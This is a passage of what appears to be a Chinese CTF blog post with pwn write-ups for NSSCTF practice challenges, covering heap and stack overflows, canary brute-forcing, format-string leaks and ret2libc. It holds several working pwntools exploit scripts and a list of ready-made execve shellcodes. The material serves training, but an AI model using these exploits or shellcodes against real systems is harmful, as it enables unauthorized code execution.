u4f1a\u52a04\u5b57\u8282\u7684\u5934<\/p>\n\n\n\n<p>\u4ee5\u6b64\u7c7b\u63a8\uff0c64\u4f4d\u4f1a\u52a08\u5b57\u8282\uff08\uff09<\/p>\n\n\n\n<p>\u597d\uff0c\u8a00\u5f52\u6b63\u4f20\u56de\u5230\u9898\u76ee<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int __cdecl main(int argc, const char **argv, const char **envp)<br>{<br> &nbsp;char *command; \/\/ &#91;esp+8h] &#91;ebp-10h]<br> &nbsp;char *s; \/\/ &#91;esp+Ch] &#91;ebp-Ch]<br>\u200b<br> &nbsp;setbuf(stdin, 0);<br> &nbsp;setbuf(stdout, 0);<br> &nbsp;s = (char *)malloc(0x16u);<br> &nbsp;command = (char *)malloc(0x16u);<br> &nbsp;puts(\"Input:\");<br> &nbsp;gets(s);<br> &nbsp;system(command);<br> &nbsp;return 0;<br>}<\/code><\/pre>\n\n\n\n<p>\u662f\u5427\uff0c\u5b9a\u4e49\u4fe9\u6307\u9488\uff0c\u7136\u540emalloc\u8fd9\u6837\u4e24\u5757<\/p>\n\n\n\n<p>0x16 = 22<\/p>\n\n\n\n<p>\u4e0d\u591f\uff0c\u586b\u7a7a\u5b57\u8282\u8fdb\u53bb<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65f6\u5019gdb\u8c03\u8bd5\u7684\u7ed3\u679c\u957f\u8fd9\u6837\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"344\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-660\"  sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u662f\u53ea\u8fdb\u884c\u4e86\u7b2c\u4e00\u6b21malloc\u7684\u6548\u679c\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u660e\u660e\u53ea\u8981\u4e860x16 = 22<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\u7ed9\u4e86\u4ece0x804b1a0\u52300x804b1bc\u7684\u957f\u5ea6<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f28\u5b57\u8282\uff08\u7c89\u8272\u5185\u5bb9\uff09<\/p>\n\n\n\n<p>\u7b49\u5230\u7b2c\u4e8c\u6b21malloc\u5b8c\u6210\uff0c\u60c5\u51b5\u4e5f\u662f\u7c7b\u4f3c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"878\" height=\"315\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-661\"  sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/div><\/figure>\n\n\n\n<p>\u597d\u4e86\uff0c\u7b2c\u4e8c\u6b21malloc\u7684\u5185\u5bb9\u4e0d\u5c31\u662f\u6211\u4eec\u8981\u7684command\u561b<\/p>\n\n\n\n<p>\u5b83\u8f93\u5165\u6ca1\u6709\u9a8c\u8bc1\u8f93\u5165\u957f\u5ea6<\/p>\n\n\n\n<p>\u6240\u4ee5\uff0c\u5806\u6ea2\u51fa\u4e0d\u5c31\u6765\u4e86\u561b<\/p>\n\n\n\n<p>\u5148\u519928\u5b57\u8282\u5783\u573e\u6570\u636e<\/p>\n\n\n\n<p>\u7136\u540e\uff0c\u90a3\u4e2a0x21\u662f\u5e72\u561b\u7684\u5462\uff0c\u5c31\u662f\u6807\u957f\u5ea6\u7684\uff0c\u8981\u662f\u60f3\u4fdd\u7559\u4e00\u70b9\u539f\u6c41\u539f\u5473\uff0c\u586b\u5b8c\u5783\u573e\u6570\u636e\u518dp32(0x21)\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u53cd\u6b63\u5b83\u53ea\u662f\u6807\u6ce8\uff0c\u4e0d\u5f71\u54cd\u5b9e\u9645\u7684\u5185\u5b58\u533a\u57df\u5206\u914d\uff0c\u522b\u628a\u6211\u4eec\u60f3\u5199\u7684\/bin\/sh\u5199\u5230\u90a3\u91cc\u53bb\u5c31\u884c\u4e86<\/p>\n\n\n\n<p>\u6240\u4ee5\u76f8\u5f53\u4e8e\u4f60\u586b28+4 \u7684\u5783\u573e\u6570\u636e\u8fdb\u53bb\u90fd\u6ca1\u4e8b\uff0c\u53cd\u6b63\u90fd\u4e00\u6837<\/p>\n\n\n\n<p>\u5b8c\u4e86\u76f4\u63a5system(&#8220;\/bin\/sh&#8221;);<\/p>\n\n\n\n<p>\u6ca1\u4e86\uff0cget shell<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[NISACTF 2022]shop_pwn<\/h2>\n\n\n\n<p>\u597d\u4e1c\u897f\uff0c\u53c8\u662f\u6761\u4ef6\u7ade\u4e89\uff0c\u8fd9\u9898\u5f53\u6761\u4ef6\u7ade\u4e89\u5165\u95e8\u9898\u611f\u89c9\u633a\u4e0d\u9519\u7684<\/p>\n\n\n\n<p>main\u6307\u5411game()<\/p>\n\n\n\n<p>game()\u6ca1\u4ec0\u4e48\u597d\u8bf4\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __noreturn game()<br>{<br> &nbsp;int v0; \/\/ eax<br> &nbsp;int i; \/\/ &#91;rsp+Ch] &#91;rbp-4h]<br>\u200b<br> &nbsp;while ( 1 )<br>  {<br> &nbsp; &nbsp;while ( 1 )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;puts(\" &nbsp; &nbsp; Welcome to my shop &nbsp; &nbsp; \");<br> &nbsp; &nbsp; &nbsp;puts(\"+===========================+\");<br> &nbsp; &nbsp; &nbsp;puts(\"| No| &nbsp; &nbsp; &nbsp;  | Sell| Recycle|\");<br> &nbsp; &nbsp; &nbsp;puts(\"+===+========+=====+========+\");<br> &nbsp; &nbsp; &nbsp;for ( i = 0; i &lt;= 15; ++i )<br> &nbsp; &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;if ( *(_DWORD *)&amp;gd&#91;24 * i + 16] )<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;printf(<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\"| %d | %-4s &nbsp; | %3d | &nbsp; %3d  |\\n\",<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&amp;gd&#91;24 * i],<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*(_DWORD *)&amp;gd&#91;24 * i + 16],<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*(_DWORD *)&amp;gd&#91;24 * i + 20]);<br> &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;puts(\"+===========================+\");<br> &nbsp; &nbsp; &nbsp;puts(\"1. look bags\\n2. buy goods\\n3. sale goods\");<br> &nbsp; &nbsp; &nbsp;printf(\"&gt; \");<br> &nbsp; &nbsp; &nbsp;v0 = read_int();<br> &nbsp; &nbsp; &nbsp;if ( v0 != 2 )<br> &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp;buy();<br> &nbsp;  }<br> &nbsp; &nbsp;if ( v0 &gt; 2 )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;if ( v0 == 3 )<br> &nbsp; &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;sale();<br> &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;else<br> &nbsp; &nbsp;  {<br> &nbsp; &nbsp; &nbsp; &nbsp;if ( v0 == 4 )<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;exit(0);<br>LABEL_17:<br> &nbsp; &nbsp; &nbsp; &nbsp;puts(\"Invalid!\");<br> &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;else<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;if ( v0 != 1 )<br> &nbsp; &nbsp; &nbsp; &nbsp;goto LABEL_17;<br> &nbsp; &nbsp; &nbsp;look();<br> &nbsp;  }<br>  }<br>}<\/code><\/pre>\n\n\n\n<p>\u5e38\u89c4\u4e70\u5356\u4ea4\u6613<\/p>\n\n\n\n<p>\u4e70\u4e5f\u4f1a\u521b\u5efa\u65b0\u7684\u7ebf\u7a0b\u8ba9\u65b0\u7ebf\u7a0b\u8fd0\u884cto_buy\u51fd\u6570<\/p>\n\n\n\n<p>\u4f46\u662fto_buy\u51fd\u6570\u6ca1\u6709\u5ef6\u65f6\uff0c\u6761\u4ef6\u7ade\u4e89\u6253\u4e0d\u4e86<\/p>\n\n\n\n<p>\u4f46\u662f\u5356\u53ef\u4ee5<\/p>\n\n\n\n<p>\u90a3\u4e48\u76ee\u6807\u5c31\u662f\u53cd\u590d\u5356\u51fa\u8d5a\u7c73<\/p>\n\n\n\n<p>\u6b38\uff0c\u90a3\u6211\u4eec\u600e\u4e48\u53cd\u590d\u5356\u5462<\/p>\n\n\n\n<p>\u51481\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"875\" height=\"565\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-662\"  sizes=\"auto, (max-width: 875px) 100vw, 875px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f00\u5c40\u4e00\u652f\u7b14\uff0c\u90a3\u6709\u529e\u6cd5\u4e86<\/p>\n\n\n\n<p>\u76f4\u63a5\u5f00\u5356\uff0c\u5c31\u5229\u7528to_Sale\u5b58\u5728\u7684\u5ef6\u65f6\uff0c\u5728\u90a3\u6bb5\u65f6\u95f4\u91cc\u75af\u72c2\u7684\u5356\u51fapen<\/p>\n\n\n\n<p>\u5356\u5b8c\u94b1\u5c31\u591f\u4e70flag\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(arch='amd64', os='linux', log_level='debug')<br>\u200b<br>io = remote('node5.anna.nssctf.cn', 23623)<br># io = process('.\/&#91;NISACTF 2022]shop_pwn')<br>\u200b<br>\u200b<br>\u200b<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'3')<br>io.sendline(b'0')<br>io.sendline(b'2')<br>io.sendline(b'1')<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2023 \u521d\u8d5b]funcanary<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)<br>{<br> &nbsp;__pid_t v3; \/\/ &#91;rsp+Ch] &#91;rbp-4h]<br>\u200b<br> &nbsp;sub_1243();<br> &nbsp;while ( 1 )<br>  {<br> &nbsp; &nbsp;v3 = fork();<br> &nbsp; &nbsp;if ( v3 &lt; 0 )<br> &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp;if ( v3 )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;wait(0LL);<br> &nbsp;  }<br> &nbsp; &nbsp;else<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;puts(\"welcome\");<br> &nbsp; &nbsp; &nbsp;sub_128A();<br> &nbsp; &nbsp; &nbsp;puts(\"have fun\");<br> &nbsp;  }<br>  }<br> &nbsp;puts(\"fork error\");<br> &nbsp;exit(0);<br>}<\/code><\/pre>\n\n\n\n<p>fork\u51fd\u6570<\/p>\n\n\n\n<p>\u5408\u7406\u4e86<\/p>\n\n\n\n<p>canary\u4e3a\u6807\u9898\uff0c\u8fd9\u91cc\u731c\u90fd\u77e5\u9053\u662f\u8981\u9760\u7206\u7834\u4e86<\/p>\n\n\n\n<p>\u7206\u7834\u7684\u601d\u8def\u4ecd\u7136\u662f\u8001\u4e00\u5957<\/p>\n\n\n\n<p>\uff08\u53ef\u4ee5\u53c2\u8003pwn119\uff09<\/p>\n\n\n\n<p>\u5148\u4e0d\u6025\uff0c\u7ee7\u7eed\u5f80\u4e0b\u770b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>unsigned __int64 sub_128A()<br>{<br> &nbsp;_BYTE buf&#91;104]; \/\/ &#91;rsp+0h] &#91;rbp-70h] BYREF<br> &nbsp;unsigned __int64 v2; \/\/ &#91;rsp+68h] &#91;rbp-8h]<br>\u200b<br> &nbsp;v2 = __readfsqword(0x28u);<br> &nbsp;read(0, buf, 0x80uLL);<br> &nbsp;return v2 - __readfsqword(0x28u);<br>}<\/code><\/pre>\n\n\n\n<p>\u6ea2\u51fa\u70b9\u627e\u5230<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = process(\".\/service\")<br>\u200b<br>'\u63a5\u53d7\u6742\u8d28\u6d88\u606f'<br>io.recvuntil(b'welcome\\n')<br>\u200b<br>\u200b<br>canary = b'\\x00'<br>for k in range(7):<br>    for i in range(256):<br>        io.send(b'a'*(0x70-8) + canary + p8(i))<br>        response = io.recvuntil('welcome\\n')<br>        if b'fun' in response:<br>            canary += p8(i)<br>            print(b'canary: ',canary)<br>            break<br>            <br>            <br>cat = 0x0231<br>\u200b<br>while(1):<br>    for i in range(16):<br>        payload = b'a'*(0x70-8) + canary + b'a'*(8) + p16(cat)<br>        io.send(payload)<br>        response = io.recvuntil(\"welcome\\n\")<br>        print(response)<br>        if b'welcome' in response:<br>            cat += 0x1000<br>            continue<br>        if b'{' in response:<br>            print(response)<br>            break<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u8f6e\u7740\u89e3\u91ca\u4e00\u4e0bexp<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b65\u7684\u4e24\u4e2a\u5d4c\u5957for\u5faa\u73af\u5c31\u662f\u4e3a\u4e86\u7206canary<\/p>\n\n\n\n<p>\u56e0\u4e3a\u4fdd\u62a4\u5168\u5f00\u7684\u539f\u56e0\uff0c\u5b58\u5728pie<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u770b\u5230\u7684cat flag\u8fd9\u4e2a\u6307\u4ee4\u7684\u4f4d\u7f6e\u4e5f\u662f\u4e0d\u786e\u5b9a\u7684<\/p>\n\n\n\n<p>\u4f46\u662f\u5185\u5b58\u5206\u9875\u673a\u5236\u5c31\u6548\u679c\u5c31\u662f\u80fd\u8ba9\u6211\u4eec\u901a\u8fc7\u7206\u7834\u5f3a\u89e3<\/p>\n\n\n\n<p>\u8fd9\u5c31\u5b8c\u4e8b\u4e86<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[HUBUCTF 2022 \u65b0\u751f\u8d5b]fmt<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>int __fastcall __noreturn main(int argc, const char **argv, const char **envp)<br>{<br> &nbsp;FILE *stream; \/\/ &#91;rsp+8h] &#91;rbp-68h]<br> &nbsp;char format&#91;32]; \/\/ &#91;rsp+10h] &#91;rbp-60h] BYREF<br> &nbsp;char s&#91;8]; \/\/ &#91;rsp+30h] &#91;rbp-40h] BYREF<br> &nbsp;__int64 v6; \/\/ &#91;rsp+38h] &#91;rbp-38h]<br> &nbsp;__int64 v7; \/\/ &#91;rsp+40h] &#91;rbp-30h]<br> &nbsp;__int64 v8; \/\/ &#91;rsp+48h] &#91;rbp-28h]<br> &nbsp;__int64 v9; \/\/ &#91;rsp+50h] &#91;rbp-20h]<br> &nbsp;__int64 v10; \/\/ &#91;rsp+58h] &#91;rbp-18h]<br> &nbsp;__int16 v11; \/\/ &#91;rsp+60h] &#91;rbp-10h]<br> &nbsp;unsigned __int64 v12; \/\/ &#91;rsp+68h] &#91;rbp-8h]<br>\u200b<br> &nbsp;v12 = __readfsqword(0x28u);<br> &nbsp;setvbuf(stdin, 0LL, 2, 0LL);<br> &nbsp;setvbuf(stdout, 0LL, 2, 0LL);<br> &nbsp;setvbuf(stderr, 0LL, 2, 0LL);<br> &nbsp;stream = fopen(\"flag.txt\", \"r\");<br> &nbsp;*(_QWORD *)s = 0LL;<br> &nbsp;v6 = 0LL;<br> &nbsp;v7 = 0LL;<br> &nbsp;v8 = 0LL;<br> &nbsp;v9 = 0LL;<br> &nbsp;v10 = 0LL;<br> &nbsp;v11 = 0;<br> &nbsp;if ( stream )<br> &nbsp; &nbsp;fgets(s, 50, stream);<br> &nbsp;HIBYTE(v11) = 0;<br> &nbsp;while ( 1 )<br>  {<br> &nbsp; &nbsp;puts(\"Echo as a service\");<br> &nbsp; &nbsp;gets(format);<br> &nbsp; &nbsp;printf(format);<br> &nbsp; &nbsp;putchar(10);<br>  }<br>}<\/code><\/pre>\n\n\n\n<p>GDB\u8c03\u8bd5\u8fd0\u884c\u5230\u8fd9\u4e2a\u4f4d\u7f6e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-9-1024x502.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"502\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-9-1024x502.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-663\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6b38\uff0c\u76f4\u63a5\u504f\u79fb\u5c31\u80fd\u627e\u5230\u4e86\u561b<\/p>\n\n\n\n<p>\u8fd9\u91ccgets\u5b58\u8fdb\u7684\u662fformat<\/p>\n\n\n\n<p>\u800cformat\u662f32\u5b57\u8282<\/p>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u91cc\u7684\u957f\u5ea6\u5c31\u662f<\/p>\n\n\n\n<p>0x40 \/ 8 + 32\/8 = 8 + 4 = 12<\/p>\n\n\n\n<p>\u4f46\u662f\uff0c\u53bb\u5b9e\u9645\u5c1d\u8bd5\u53d1\u73b012\u5e76\u4e0d\u884c\uff0c\u5b9e\u9645\u4e0a\u5e94\u8be5\u5f80\u540e\u632a\u4e00\u4f4d\u624d\u662f\u771f\u6b63\u7684\u504f\u79fb\u503c<\/p>\n\n\n\n<p>\u4f46\u662f\u53c8\u6709\u95ee\u9898\uff0c\u5b83\u8f93\u51fa\u7684\u503c\u662f16\u8fdb\u5236\u7684\uff0c\u6240\u4ee5\u8fd8\u5f97\u518d\u8f6c\u4e00\u6b21ascll<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-10.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"899\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-10.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-664\"  sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/div><\/figure>\n\n\n\n<p>\u8f6c\u8f6c\u5c31\u597d\u4e86\uff08\uff09<\/p>\n\n\n\n<p>\u6ce8\u610f\u6362\u6210\u5c0f\u7aef\u5e8f<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]safe_shellcode<\/h2>\n\n\n\n<p>\u6ca1\u5565\u597d\u8bf4\u7684<\/p>\n\n\n\n<p>\u4f46\u662f\u8bb0\u5f55\u4e00\u4e0b\u8fd9\u4e2a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># 32\u4f4d \u77ed\u5b57\u8282shellcode --&gt; 21\u5b57\u8282<br>\\x6a\\x0b\\x58\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\xcd\\x80<br>\u200b<br># 32\u4f4d \u7eafascii\u5b57\u7b26shellcode<br>PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA<br>\u200b<br># 32\u4f4d scanf\u53ef\u8bfb\u53d6\u7684shellcode<br>\\xeb\\x1b\\x5e\\x89\\xf3\\x89\\xf7\\x83\\xc7\\x07\\x29\\xc0\\xaa\\x89\\xf9\\x89\\xf0\\xab\\x89\\xfa\\x29\\xc0\\xab\\xb0\\x08\\x04\\x03\\xcd\\x80\\xe8\\xe0\\xff\\xff\\xff\/bin\/sh<br>\u200b<br># 64\u4f4d scanf\u53ef\u8bfb\u53d6\u7684shellcode 22\u5b57\u8282<br>\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\xb0\\x3b\\x99\\x0f\\x05<br>\u200b<br># 64\u4f4d \u8f83\u77ed\u7684shellcode  23\u5b57\u8282<br>\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05<br>\u200b<br># 64\u4f4d \u7eafascii\u5b57\u7b26shellcode<br>Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t<br>\u200b<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]ezcmp<\/h2>\n\n\n\n<p>x\/10gx *0x404100<\/p>\n\n\n\n<p>p64\u5206\u6bb5\u4f20\u5165<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[SWPUCTF 2022 \u65b0\u751f\u8d5b]Integer Overflow<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#io = process(\".\/pwn\")<br>io = remote(\"node5.anna.nssctf.cn\",21127)<br>\u200b<br>io.sendline(b'1')<br>io.sendline(b'-1')<br>\u200b<br>offset = 0x20 + 4<br>bin_sh = 0x804A008<br>system = 0x80494FB<br>ret = 0x0804900e<br>\u200b<br>\u200b<br>pd = b'a' * offset <br>pd += p32(system)<br>pd += p32(bin_sh)<br>\u200b<br>\u200b<br># gdb.attach(io)<br>\u200b<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[\u6df1\u80b2\u676f 2021]find_flag<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = remote(\"node4.anna.nssctf.cn\",28334)<br># io = process(\".\/find_flag\")<br>\u200b<br>\u200b<br>io.sendlineafter(b'name?', b'%17$p.%19$p')<br>io.recvuntil(b'you, ')<br>leak = io.recvuntil(b'!')&#91;0:-1] <br>\u200b<br>\u200b<br>leak_str = leak.decode()<br>canary_str, stack_str = leak_str.split('.') &nbsp;<br>canary = int(canary_str, 16) &nbsp;<br>stack_addr = int(stack_str, 16) &nbsp;<br>\u200b<br>\u200b<br>success(f\"canary: {hex(canary)}\")<br>success(f\"stack_addr: {hex(stack_addr)}\")<br>\u200b<br>\u200b<br>base_addr = stack_addr - 0x146F<br>flag_addr = base_addr + 0x1231<br>success(f\"flag_addr: {hex(flag_addr)}\")<br>\u200b<br>\u200b<br>pd = b'a'*(0x40 - 0x8) + p64(canary) + p64(0) + p64(flag_addr)<br>\u200b<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6709\u624b\u5c31\u884c\u7684\u6808\u6ea2\u51fa<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"node5.anna.nssctf.cn\",29100)<br>\u200b<br>\u200b<br>ret = 0x000000000040101a<br>backd = 0x0000000000401257<br>\u200b<br>payload = b'a'*(32+8) + p64(ret) +p64(backd)<br>\u200b<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[BJDCTF 2020]babyrop<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>\u200b<br>io = remote('node4.anna.nssctf.cn',28199)<br># io=process(\".\/pwn\")<br>elf = ELF('.\/pwn')<br>libc= ELF(elf.libc.path)<br>\u200b<br>ret_add =0x00000000004004c9<br>pop_rdi =0x0000000000400733<br>main_add =0x0000000004006AD<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \",hex(puts_got))<br>print(\"Puts_plt: \",hex(puts_plt))<br>\u200b<br>offset=0x20<br>\u200b<br>payload1 = b'a' * (offset+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)<br>io.sendlineafter(b'story!', payload1)<br>puts_addr = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>print(\"Puts_addr: \",hex(puts_addr))<br>\u200b<br>\u200b<br>\u200b<br>libc_base = puts_addr -     0x4ef50<br>system_add = libc_base +    0x24c50<br>bin_sh_add = libc_base + 0x16c617<br>\u200b<br>payload2 = b'a' * (offset+8) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + 